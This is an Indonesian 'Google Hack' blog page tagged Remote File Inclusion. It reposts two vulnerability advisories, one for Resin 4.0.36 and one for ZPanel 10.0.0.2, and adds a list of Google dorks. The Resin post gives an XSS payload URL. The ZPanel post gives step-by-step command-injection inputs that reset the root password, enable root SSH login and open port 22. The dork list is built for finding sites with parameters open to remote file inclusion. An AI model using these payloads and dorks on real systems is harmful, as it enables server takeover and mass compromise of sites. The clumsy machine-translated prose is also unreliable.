Template by:
Free Blog Templates

Showing posts with label Remote File Inclusion. Show all posts
Showing posts with label Remote File Inclusion. Show all posts

Resin Application Server 4.0.36 XSS / Source Code Disclosure

Berbeda dengan vuln  yang sebelumnya tentang ZPanel 10.0.0.2 Remote Command Execution Vulnerability kali ini dari 133day memposting Resin Application Server 4.0.36 XSS / Source Code Disclosure. Uraiannya bisa dibaca dibawah ini.
Resin Application Server 4.0.36 Cross-Site Scripting Kerentanan
 
Penyedia: Caucho Technology, Inc
Produk web page: http://www.caucho.com
Versi Terkena: Resin Web Profesional Dan Application Server 4.0.36
 
 
Ringkasan: Resin adalah Java Application Server untuk lalu lintas tinggi situs yang membutuhkan kecepatan dan skalabilitas. Ini adalah salah satu yang paling awal Java Server Aplikasi, dan memiliki teruji waktu karena rekayasa kecakapan.
 
Desc: Resin Aplikasi dan Web Server Plugin menderita XSS mengeluarkan karena kegagalan untuk benar membersihkan masukan yang disediakan pengguna untuk yang 'logout' GET parameter dalam 'index.php' skrip. XSS berbasis URI Masalah juga hadir dan kedua dari kerentanan dapat dipicu setelah user / admin login (post-auth). Penyerang dapat mengeksploitasi kelemahan ini untuk mengeksekusi HTML sewenang-wenang dan kode script di pengguna sesi browser.
 
Diuji pada: Resin Professional 4.0.36 (dibangun Fri, 26 Apr 2013 03:33:09 PDT)
Java HotSpot (TM) 64-Bit Server VM 23.3-b01
4 cpu, Windows 7 amd64 6.1
 
Kerentanan ditemukan oleh Gjoko 'LiquidWorm' Krstic
@ zeroscience
 
Penasehat ID: ZSL-2013-5143
Penasehat URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5143.php


Exploits
http://127.0.0.1:8080/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
 
--
 

[+/-] Selengkapnya...

Google hack ZPanel 10.0.0.2 Remote Command Execution Vulnerability

Setelah beberapa hari yang lalu Google Hack posting tetang beberapa reviews tentang AGEN BOLA LIGABET88 PROMO BONUS 100% IBCBET SBOBET 368BET, anekahosting.com web hosting murah terbaik di indonesia dan Cari Uang lewat ekiosku.com kali ini akan mempublikasikan vuln dari salah satu web terkemuka yaitu 1337day tentang ZPanel 10.0.0.2 Remote Command Execution Vulnerability.
Salah satu anggota tim ahli kami (shachibista@gmail.com) yang ditugaskan untuk melakukan audit keamanan kode ZPanel telah menemukan follwoing kerentanan keamanan dengan ZPanel 10.0.0.2 yang akan memungkinkan orang untuk meningkat dengan accress akar dan mengakses server dengan siapa pun. itu audit keamanan menyatakan sebagai berikut:

Saya telah meninjau kode ZPanel dan ada remote serius kerentanan eksekusi di "Protect Directory" modul yang memungkinkan siapa pun dengan akses ke halaman (Administrator, Reseller dan Klien secara default) untuk mengeksekusi perintah sewenang-wenang pada shell karena tidak benar (tidak ada) melarikan diri dari masukan pengguna. Langkah-langkah berikut dapat diambil untuk  mereproduksi mengeksploitasi:

1. Login as any user and visit
 
1a. In the "Username" field input (including the initial semicolon and
the final hash):
 
;/etc/zpanel/panel/bin/zsudo "echo 'newpassword'" "| passwd --stdin root" #
 
2. Type any password
 
3. Root password will be set to "newpassword"
 
 
5. In the "Username" field (including initial semicolon and final hash):
 
;/etc/zpanel/panel/bin/zsudo sed '-i "s/#*\(PermitRootLogin\)/\1 yes
\#/" /etc/ssh/*hd*g' #
 
6. This will enable root login,
 
7. Satu dapat mengulangi proses yang sama untuk membuka port 22 melalui iptables (iptables-A  INPUT-p tcp - dport 22-j ACCEPT) dan restart ssh Server (ini akan membutuhkan proses dua kali sebagai internal buffer ukuran perintah zsudo adalah 100 karakter)

Regards
Google Hack

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 22

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 21

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 20

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 19

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 18

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 17

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 16

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 15

index.php?oldal= inurl:"index.php?oldal=*.php" index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php" index.php?pag= inurl:"index.php?pag=*.php" index.php?incl= inurl:"index.php?incl=" avatar.php?page= inurl:"avatar.php?page=" index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absol ute_path= "Mambo is A Free" index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absol ute_path= "Mambo is" index.php?p= inurl:"edu/index.php?p=*.php" /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/ index.php?x= inurl:"com/index.php?x=*.php" administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler" /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date= administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler" content.php?page= inurl:"*content.php?page=*.php" dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path= inurl:"com_linkdirectory" administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components" modules/My_eGallery/index.php?basepath= inurl:"My_eGallery"

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 14

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 13

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 12

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 11

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 10

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 9

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 8

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 7

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 6

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 5

[+/-] Selengkapnya...